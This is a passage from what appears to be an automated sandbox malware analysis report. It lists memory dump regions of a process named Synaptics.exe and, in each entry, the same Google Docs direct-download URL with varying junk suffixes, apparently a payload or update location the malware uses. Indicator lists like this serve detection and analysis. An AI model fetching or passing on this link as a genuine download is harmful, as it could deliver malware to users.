00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEPb
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEQE
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF;
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFVlF
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG$
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG9
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI8
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI9
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIw
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIw#
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIwj
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2956093270.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJl
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKn8
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3070010239.000000003B051000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL8
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMTM
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMm
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN:
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOG
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOGlE
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP;
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQQQ
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR5Q
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadReJ
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS.xl
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS9(
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSeH
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTl
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUA-M
